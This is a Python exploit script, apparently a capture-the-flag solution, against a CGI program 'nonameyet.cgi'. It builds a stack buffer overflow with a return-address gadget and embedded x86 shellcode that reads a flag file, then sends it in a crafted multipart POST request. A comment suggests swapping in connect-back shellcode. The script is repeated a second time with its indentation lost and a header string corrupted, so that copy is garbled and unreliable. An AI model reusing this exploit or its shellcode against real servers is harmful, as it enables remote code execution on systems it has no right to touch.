potetisensei/nonameyet.py

## nonameyet.py
from socket import *
from time import time, sleep
from struct import pack
from sys import argv

HOST = "localhost"
shellcode = "\x31\xc0\x50\x68\x66\x6c\x61\x67\x68\x2e\x2e\x2f\x2f\x54\x5f\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x54\x5b\x50\x57\x53\x54\x59\x6a\x0b\x58\xcd\x80" # should use connectback shellcode actually

def main():
    payload1 = "a" * 34
    payload1 += pack("<B", 84)

    payload2 = ""
    payload2 += "\x7E\x0C\x7E\x0C" # ebp, and jmp + 0xE
    payload2 += pack("<I", 0x0804a423) # return address, "pushad; pop; pop; pop; ret;" gadget. This makes it possible to execute stack!!!
    payload2 += pack("<I", 0x0804F87E) # will be executed. So the last two bytes represents "jmp -6"
    payload2 += "\x90" * 4
    payload2 += shellcode

    assert(not "\x00" in payload1)
    assert(not "\r" in payload1)
    assert(not "\n" in payload1)
    assert(not "\x00" in payload2)
    assert(not "\r" in payload2)
    assert(not "\n" in payload2)
    data = "-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"%25Genr%25%25Time%25\"\r\n\r\nthis is absolutely photo\r\n-----------------------------1948084979928559891542425288\r\n-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"genr\";\r\n\r\n{}\r\n-----------------------------1948084979928559891542425288\r\n-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"time\";\r\n\r\n{}\r\n-----------------------------1948084979928559891542425288--".format(payload1, payload2)
    with open("input", "wb") as f:
        f.write(data)

    request = "POST /nonameyet.cgi HTTP/1.1\r\n"
    request += "Host: {}\r\n".format(HOST)
    request += "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\r\n"
    request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    request += "Accept-Language: ja,en-US;q=0.7,en;q=0.3\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Referer: http://{}/?page=contact".format(HOST)
    request += "Connection: keep-alive\r\n"
    request += "Content-Type: multipart/form-data; boundary=---------------------------1948084979928559891542425288\r\n"
    request += "Content-Length: {}\r\n\r\n".format(len(data))
    request += data

    p = socket(AF_INET, SOCK_STREAM)
    p.connect((HOST, 80))
    p.sendall(request)

    print [p.recv(1024)]
    print [p.recv(1024)]
    print [p.recv(1024)]

if __name__ == "__main__":
    main()
	from socket import *
	from time import time, sleep
	from struct import pack
	from sys import argv

	HOST = "localhost"
	shellcode = "\x31\xc0\x50\x68\x66\x6c\x61\x67\x68\x2e\x2e\x2f\x2f\x54\x5f\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x54\x5b\x50\x57\x53\x54\x59\x6a\x0b\x58\xcd\x80" # should use connectback shellcode actually

	def main():
	payload1 = "a" * 34
	payload1 += pack("<B", 84)

	payload2 = ""
	payload2 += "\x7E\x0C\x7E\x0C" # ebp, and jmp + 0xE
	payload2 += pack("<I", 0x0804a423) # return address, "pushad; pop; pop; pop; ret;" gadget. This makes it possible to execute stack!!!
	payload2 += pack("<I", 0x0804F87E) # will be executed. So the last two bytes represents "jmp -6"
	payload2 += "\x90" * 4
	payload2 += shellcode

	assert(not "\x00" in payload1)
	assert(not "\r" in payload1)
	assert(not "\n" in payload1)
	assert(not "\x00" in payload2)
	assert(not "\r" in payload2)
	assert(not "\n" in payload2)
	data = "-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"%25Genr%25%25Time%25\"\r\n\r\nthis is absolutely photo\r\n-----------------------------1948084979928559891542425288\r\n-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"genr\";\r\n\r\n{}\r\n-----------------------------1948084979928559891542425288\r\n-----------------------------1948084979928559891542425288\r\nContent-Disposition: form-data; name=\"time\";\r\n\r\n{}\r\n-----------------------------1948084979928559891542425288--".format(payload1, payload2)
	with open("input", "wb") as f:
	f.write(data)

	request = "POST /nonameyet.cgi HTTP/1.1\r\n"
	request += "Host: {}\r\n".format(HOST)
	request += "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\r\n"
	request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n"
	request += "Accept-Language: ja,en-US;q=0.7,en;q=0.3\r\n"
	request += "Accept-Encoding: gzip, deflate\r\n"
	request += "Referer: http://{}/?page=contact".format(HOST)
	request += "Connection: keep-alive\r\n"
	request += "Content-Type: multipart/form-data; boundary=---------------------------1948084979928559891542425288\r\n"
	request += "Content-Length: {}\r\n\r\n".format(len(data))
	request += data

	p = socket(AF_INET, SOCK_STREAM)
	p.connect((HOST, 80))
	p.sendall(request)

	print [p.recv(1024)]
	print [p.recv(1024)]
	print [p.recv(1024)]

	if __name__ == "__main__":
	main()